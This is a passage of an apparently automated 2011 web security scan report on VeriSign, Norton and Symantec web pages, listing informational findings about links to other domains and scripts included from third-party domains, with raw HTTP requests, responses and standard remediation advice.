<iframe src="//view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0">
</iframe>
...[SNIP]...
<li><a href='//www.verisign.be/'>Belgium</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.dk/'>Denmark</a>
...[SNIP]...
<li><a href='//www.verisign.fr/'>France</a>
...[SNIP]...
<li><a href='//www.verisign.de/'>Germany</a>
...[SNIP]...
<li><a href='//www.verisign.in/'>India</a>
...[SNIP]...
<li><a href='//www.verisign.it/'>Italy</a>
...[SNIP]...
<li><a href='//www.verisign.es/'>Spain</a>
...[SNIP]...
<li><a href='//www.verisign.se/'>Sweden</a>
...[SNIP]...
<li><a href='//www.verisign.ch/'>Switzerland</a>
...[SNIP]...
<li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign">Contact VeriSign</a>
...[SNIP]...
<noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>
...[SNIP]...
<img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"><img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>
...[SNIP]...
<div id="vid_container">

<script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent">
</script>
<noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_nezp_gh3eobtg" width="356" height="224" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab">
<param name="movie" value="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" />
...[SNIP]...
<param name="wmode" value="transparent" />
       <embed src="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" bgcolor="#000000" width="356" height="224" name="ooyalaPlayer_nezp_gh3eobtg" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG" pluginspage="http://www.adobe.com/go/getflashplayer">
</embed>
...[SNIP]...
<div id="logos" class="floatl">
<a href="http://www.facebook.com/VeriSignAuthentication"><img src="/assets/trust-seal/images/Facebook.png" alt="Facebook" style="margin-left:34px; margin-right:37px;"/></a><a href="http://www.twitter.com/TrustSeal"><img src="/assets/trust-seal/images/Twitter.png" alt="Twitter" style="margin-right:37px;"/></a><a href="http://www.youtube.com/user/VeriSignAuth"><img src="/assets/trust-seal/images/YouTube.png" alt="YouTube" />
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'>Contact VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'>About VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'>News</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>). Symantec products include <a href='//us.norton.com/index.jsp'>Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'>Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'>PC Tools</a>
...[SNIP]...

14.70. http://www.verisign.com/verisign-worldwide/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.com
Path:	/verisign-worldwide/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.verisign.com/verisign-worldwide/index.html?tid=footer

The response contains the following links to other domains:

http://smallbusiness.norton.com/?inid=soho_verisign_footer
http://us.norton.com/index.jsp
http://www.addthis.com/bookmark.php?v=250
http://www.addthis.com/bookmark.php?v=250&username=verisign
http://www.pctools.com/
http://www.symantec.com/
http://www.symantec.com/about/news/release/index.jsp?tid=footer
http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products
http://www.verisign.be/
http://www.verisign.ch/
http://www.verisign.de/
http://www.verisign.dk/
http://www.verisign.es/
http://www.verisign.fr/
http://www.verisign.in/
http://www.verisign.it/
http://www.verisign.se/
http://www.verisignchina.com.cn/
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:10 GMT
Content-Type: text/html
Content-Length: 42646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>

   
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte
...[SNIP]...
<li><a href='//www.verisign.be/'>Belgium</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.dk/'>Denmark</a>
...[SNIP]...
<li><a href='//www.verisign.fr/'>France</a>
...[SNIP]...
<li><a href='//www.verisign.de/'>Germany</a>
...[SNIP]...
<li><a href='//www.verisign.in/'>India</a>
...[SNIP]...
<li><a href='//www.verisign.it/'>Italy</a>
...[SNIP]...
<li><a href='//www.verisign.es/'>Spain</a>
...[SNIP]...
<li><a href='//www.verisign.se/'>Sweden</a>
...[SNIP]...
<li><a href='//www.verisign.ch/'>Switzerland</a>
...[SNIP]...
<li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign">Contact VeriSign</a>
...[SNIP]...
<noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>
...[SNIP]...
<img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&username=verisign" class="addthis_button" addthis:ui_click="true"><img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>
...[SNIP]...
<p name="p1" id="p1">
                               VeriSign Authentication Services, now part of
                               <a href="//www.symantec.com">Symantec Corp.</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.fr/">France</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<p class="greytext">
                                               If your country is not listed above please visit our English language site
                                               <a id="qlinks" class="qlink greytext" target="_top" href="//www.verisign.ch/">VeriSign Switzerland</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.be/'>VeriSign Belgium</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.dk/'>VeriSign Denmark</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.fr/'>VeriSign France</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.de/'>VeriSign Germany</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.it/'>VeriSign Italy</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.es/'>VeriSign Spain</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.se/'>VeriSign Sweden</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.ch/'>VeriSign Switzerland</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisignchina.com.cn/'>VeriSign China</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.in/'>VeriSign India</a>
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'>Contact VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'>About VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'>News</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>). Symantec products include <a href='//us.norton.com/index.jsp'>Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'>Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'>PC Tools</a>
...[SNIP]...

15. Cross-domain script include previous next
There are 45 instances of this issue:

http://blogs.verisign.com/web-user-experience/
http://community.norton.com/norton/
http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline
http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1
http://de.community.norton.com/
http://free.pctools.com/free-antivirus/
http://investor.symantec.com/phoenix.zhtml
https://knowledge.verisign.ch/support/code-signing-support/index.html
https://knowledge.verisign.ch/support/digital-id-support/index.html
https://knowledge.verisign.ch/support/mpki-support/index.html
https://knowledge.verisign.ch/support/ssl-certificates-support/index
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
https://knowledge.verisign.ch/support/trust-seal-support/index.html
http://query.verisign.ch/search
https://securitycenter.verisign.com/celp/enroll/outsideSearch
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/console_login
http://store.symantec.com/
https://symantec-corporation.com/servlet/campaignrespondent
https://trust-center.verisign.ch/process/retail/console_login
https://trust-center.verisign.com/process/retail/console_login
https://trust-center.verisign.com/process/retail/help_and_support
https://trust-center.verisign.com/process/retail/trust_product_selector
http://us.norton.com/360
http://us.norton.com/downloads/index.jsp
http://us.norton.com/familyresources/index.jsp
http://us.norton.com/nortonlive/
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/products/index.jsp
http://us.norton.com/security_response/index.jsp
http://www.symantec.com/connect/
http://www.verisign.ch/
http://www.verisign.ch/contact-information/index.html
http://www.verisign.ch/corporate/index.html
http://www.verisign.ch/trust-seal/index.html
http://www.verisign.com/
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/partners/ssl-reseller-programs/index.html
http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
http://www.verisign.com/ssl/buy-ssl-certificates/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/verisign-worldwide/index.html
https://www.verisign.com/
https://www.verisign.com/products-services/index.html

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

15.1. http://blogs.verisign.com/web-user-experience/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.verisign.com
Path:	/web-user-experience/

Issue detail

The response dynamically includes the following scripts from other domains:

http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-rapidssl-seal-design-avail.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-video-banner-interactivity-debuts-on-geotrust-website.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/study-users-choose-convenience-over-clicks.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/firefox-5-offers-improved-text-and-multimedia-capabilities.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-always-on-ssl-and-firesheep-attacks-page.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-code-signing-redesign.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/redesign-simplifies-options-for-getting-trust-seal.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/what-the-first-ever-website-teaches-us-about-usability.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/07/introducing-trust-seal-monthly-service.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-homepage-facelift.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-logo-gets-a-sharper-profile.php
http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/launch-of-eperspectives-executive-blog.php
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/javascripts/typepad.js
http://twitter.com/statuses/user_timeline/ReshmaKumar.json?callback=twitterCallback2&count=5
https://ssl.google-analytics.com/urchin.js

Request

GET /web-user-experience/ HTTP/1.1
Host: blogs.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:59 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.0.4
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>
<tit
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/launch-of-eperspectives-executive-blog.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-logo-gets-a-sharper-profile.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-homepage-facelift.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/07/introducing-trust-seal-monthly-service.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/what-the-first-ever-website-teaches-us-about-usability.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/firefox-5-offers-improved-text-and-multimedia-capabilities.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-code-signing-redesign.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-always-on-ssl-and-firesheep-attacks-page.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/redesign-simplifies-options-for-getting-trust-seal.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-video-banner-interactivity-debuts-on-geotrust-website.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/study-users-choose-convenience-over-clicks.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-rapidssl-seal-design-avail.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/typepad.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/ReshmaKumar.json?callback=twitterCallback2&count=5"></script>
...[SNIP]...
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

15.2. http://community.norton.com/norton/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.norton.com
Path:	/norton/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js
http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js

Request

GET /norton/ HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.3. http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.norton.com
Path:	/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js
http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js

Request

GET /t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 339433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<![endif]-->

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"></script>

<script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...

<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js"></script>
...[SNIP]...

15.4. http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.norton.com
Path:	/t5/Norton-Protection-Blog/bg-p/npb1

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=4wNTh0OokmJIZVk29a3GDSLrYrBTfMFc&height=370&playerContainerId=lia-vid-4wNTh0OokmJIZVk29a3GDSLrYrBTfMFcw640h370r865&width=640&wmode=opaque
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7&height=370&playerContainerId=lia-vid-5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7w640h370r944&width=640&wmode=opaque
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFs&height=370&playerContainerId=lia-vid-RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFsw640h370r895&width=640&wmode=opaque
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6n&height=360&playerContainerId=lia-vid-VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6nw640h360r928&width=640&wmode=opaque
http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=o4d2ZxOjymhjnOVjrWcXiS1riXUG85aO&height=338&playerContainerId=lia-vid-o4d2ZxOjymhjnOVjrWcXiS1riXUG85aOw600h338r689&width=600&wmode=opaque
http://connect.facebook.net/en_US/all.js
http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js
http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js

Request

GET /t5/Norton-Protection-Blog/bg-p/npb1 HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 422706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<![endif]-->

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"></script>

<script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=4wNTh0OokmJIZVk29a3GDSLrYrBTfMFc&height=370&playerContainerId=lia-vid-4wNTh0OokmJIZVk29a3GDSLrYrBTfMFcw640h370r865&width=640&wmode=opaque"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=o4d2ZxOjymhjnOVjrWcXiS1riXUG85aO&height=338&playerContainerId=lia-vid-o4d2ZxOjymhjnOVjrWcXiS1riXUG85aOw600h338r689&width=600&wmode=opaque"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7&height=370&playerContainerId=lia-vid-5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7w640h370r944&width=640&wmode=opaque"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFs&height=370&playerContainerId=lia-vid-RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFsw640h370r895&width=640&wmode=opaque"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&embedCode=VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6n&height=360&playerContainerId=lia-vid-VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6nw640h360r928&width=640&wmode=opaque"></script>
...[SNIP]...

<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js"></script>
...[SNIP]...

15.5. http://de.community.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.community.norton.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://nortonde.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js
